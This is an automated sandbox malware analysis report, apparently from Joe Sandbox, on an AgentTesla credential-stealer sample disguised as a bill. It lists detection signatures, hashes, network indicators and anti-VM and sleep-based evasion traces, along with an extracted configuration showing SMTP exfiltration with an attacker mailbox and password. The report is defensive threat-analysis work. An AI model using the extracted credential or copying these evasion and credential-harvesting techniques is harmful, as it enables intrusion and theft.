
Analysis Report BILL-OOO566876.exe

Overview

General Information

Sample Name: BILL-OOO566876.exe
Analysis ID: 385473
MD5: 1c84862e5b015bcecf6a194d17172dcf
SHA1: a3e0a0bda2cdef94089a6012bd025113f9fbead9
SHA256: ea29689e038f2a801066054f8ae2e3e3884127e8ac897f5467055250ce2b42f9
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • BILL-OOO566876.exe (PID: 1308 cmdline: 'C:\Users\user\Desktop\BILL-OOO566876.exe' MD5: 1C84862E5B015BCECF6A194D17172DCF)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "rainie.wang@syntrnomh.comTdn$AuZro1smtp.syntrnomh.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: BILL-OOO566876.exe PID: 1156 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.BILL-OOO566876.exe.40f75c0.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.2.BILL-OOO566876.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.BILL-OOO566876.exe.40f75c0.2.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.BILL-OOO566876.exe.3fb6720.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 2.2.BILL-OOO566876.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "rainie.wang@syntrnomh.comTdn$AuZro1smtp.syntrnomh.com"}
Multi AV Scanner detection for submitted file
Source: BILL-OOO566876.exe | Virustotal: Detection: 24%
Source: BILL-OOO566876.exe | ReversingLabs: Detection: 52%
Machine Learning detection for sample
Source: BILL-OOO566876.exe | Joe Sandbox ML: detected
Source: 2.2.BILL-OOO566876.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: BILL-OOO566876.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: BILL-OOO566876.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mscorrc.pdb source: BILL-OOO566876.exe, 00000000.00000002.235301407.00000000093A0000.00000002.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.473146526.0000000000FC0000.00000002.00000001.sdmp
Source: global traffic | TCP traffic: 192.168.2.3:49739 -> 208.91.199.225:587
Source: Joe Sandbox View | IP Address: 208.91.199.225 208.91.199.225
Source: unknown | DNS traffic detected: queries for: smtp.syntrnomh.com

System Summary:

.NET source code contains very large array initializations
Source: 2.2.BILL-OOO566876.exe.400000.0.unpack, <PrivateImplementationDetails>{386A76A6-42AD-45E1-9C77-7549EE260D53}/CA2BB758-C547-44EC-A120-BDF675DDAE8B.cs | Large array initialization: .cctor: array initializer size 11936
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: BILL-OOO566876.exe
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_00DCB0BA NtQuerySystemInformation,
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_00DCB089 NtQuerySystemInformation,
Source: BILL-OOO566876.exe | Binary or memory string: OriginalFilename vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe | Binary or memory string: get_SaveOriginalFilenames vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe | Binary or memory string: set_SaveOriginalFilenames vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe | Binary or memory string: SaveOriginalFilenames vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe | Binary or memory string: chkSaveOriginalFileNames vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000000.00000002.224944328.00000000051F0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMetroFramework.dll> vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000000.00000000.201469299.00000000007E2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamemWu~ vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameRJrtDKvhAdvpEZGtLbeHPhuoFONJcv.exe4 vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000000.00000002.235301407.00000000093A0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000002.00000002.470196435.0000000000632000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamemWu~ vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000002.00000002.472372681.0000000000D80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000002.00000002.473146526.0000000000FC0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameRJrtDKvhAdvpEZGtLbeHPhuoFONJcv.exe4 vs BILL-OOO566876.exe
Source: BILL-OOO566876.exe, 00000002.00000002.472477668.0000000000D90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamewshom.ocx.mui vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: get_SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: set_SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: HttpWebRequestMethodIfModifiedSinceDownloadsget_SaveThumbnailsset_SaveThumbnailsget_SaveHTMLset_SaveHTMLget_SaveOriginalFilenamesset_SaveOriginalFilenamesget_PreventDuplicatesset_PreventDuplicatesget_DownloadPathset_DownloadPathget_ScannerDelayset_ScannerDelayget_AllowFileNamesGreaterThan255set_AllowFileNamesGreaterThan255get_fchanWarningset_fchanWarningget_UseThreadNameset_UseThreadName vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: SaveOriginalFilenames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: SaveThumbnailsSaveHTMLSaveOriginalFilenamesPreventDuplicatesDownloadPathScannerDelayAllowFileNamesGreaterThan255fchanWarningUseThreadNameErrorLogReportWebExceptionWebExceptionWebsiteAddressReportExceptionExceptionIsWriteToFileWriteToFileBuffer vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: chkSaveOriginalFileNames vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: frmSettingstcMainTabControltabDownloadsTabPagenumTimerNumericUpDownlbTimerlbSavePathbtnBrowsechkMoveExistingDownloadsCheckBoxtabApplicationtabAdvancedtabResetbtnUserScriptbtnProtocolbtnSCanbtnSSavechkPreventDuplicateschkSaveOriginalFileNameschkDownloadThumbnailschkDownloadHTMLtxtSavePathchkUseFullBoardNameForTitlechkEnableUpdateschkShowExitWarningchkMinimizeToTraychkShowTrayIconttSettingsToolTipchkSaveDownloadQueueOnExitlbUserAgentchkSilenceErrorschkDisableScannerWhenOpeningSettingstxtUserAgentbtnOpenLocalFilestabRegexlbRegexInfotxtRegexlvRegexchkAllowFileNamesGreaterThan255chkMinimizeInsteadOfExitinglbRegexHintchkResetRegexSettingschkResetAdvancedSettingschkResetApplicationSettingschkResetDownloadSettingsbtnResetSettingschkEnableSettingsResetlbScanDelaySecondschkRetrieveThreadNamebtnSSave_ClickLoadSettingsSaveSettingsbtnBrowse_ClickbtnSCan_ClickbtnOpenLocalFiles_ClicklvRegex_SelectedIndexChangedtxtRegex_TextChangedchkEnableSettingsReset_CheckedChangedbtnResetSettings_Click vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeBinary or memory string: OriginalFilenamemWu~ vs BILL-OOO566876.exe
                    Source: BILL-OOO566876.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: BILL-OOO566876.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 2.2.BILL-OOO566876.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_00DCAF3E AdjustTokenPrivileges,
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_00DCAF07 AdjustTokenPrivileges,
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\BILL-OOO566876.exe.log
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: BILL-OOO566876.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: BILL-OOO566876.exe | Virustotal: Detection: 24%
Source: BILL-OOO566876.exe | ReversingLabs: Detection: 52%
Source: unknown | Process created: C:\Users\user\Desktop\BILL-OOO566876.exe 'C:\Users\user\Desktop\BILL-OOO566876.exe'
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Process created: C:\Users\user\Desktop\BILL-OOO566876.exe {path}
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: BILL-OOO566876.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: BILL-OOO566876.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mscorrc.pdb | source: BILL-OOO566876.exe, 00000000.00000002.235301407.00000000093A0000.00000002.00000001.sdmp, BILL-OOO566876.exe, 00000002.00000002.473146526.0000000000FC0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 0_2_007E2D3F push es; retf
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 0_2_007E2900 push 00000001h; ret
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 0_2_007E68FC push es; ret
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 0_2_007E26F3 push esp; retf
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 0_2_007E24D9 push edx; retf
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 0_2_050727D2 push es; ret
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 0_2_05076289 push FFFFFFB2h; retf
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_00632D3F push es; retf
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_00632900 push 00000001h; ret
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_006326F3 push esp; retf
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_006368FC push es; ret
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_006324D9 push edx; retf
Source: initial sample | Static PE information: section name: .text entropy: 7.62974179137
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: Process Memory Space: BILL-OOO566876.exe PID: 1308, type: MEMORY
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Function Chain: systemQueried,systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,systemQueried,processQueried,processQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Window / User API: threadDelayed 665
Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 6024 | Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 6040 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800 | Thread sleep count: 665 > 30
Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800 | Thread sleep time: -19950000s >= -30000s
Source: C:\Users\user\Desktop\BILL-OOO566876.exe TID: 4800 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Thread delayed: delay time: 31500
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Thread delayed: delay time: 30000
Source: BILL-OOO566876.exe, 00000002.00000002.471992237.0000000000CDD000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllessor Free20191113112613.000000-420\Device\HarddiskVolume2\Device\HarddiskVolume420200930080229.493177-42064-bit
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: BILL-OOO566876.exe, 00000002.00000002.471992237.0000000000CDD000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: BILL-OOO566876.exe, 00000000.00000002.221270169.0000000002F9C000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: BILL-OOO566876.exe, 00000002.00000002.477494800.0000000005160000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Code function: 2_2_00F9C948 LdrInitializeThunk,
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Memory written: C:\Users\user\Desktop\BILL-OOO566876.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Process created: C:\Users\user\Desktop\BILL-OOO566876.exe {path}
Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: BILL-OOO566876.exe, 00000002.00000002.473566293.0000000001540000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\BILL-OOO566876.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
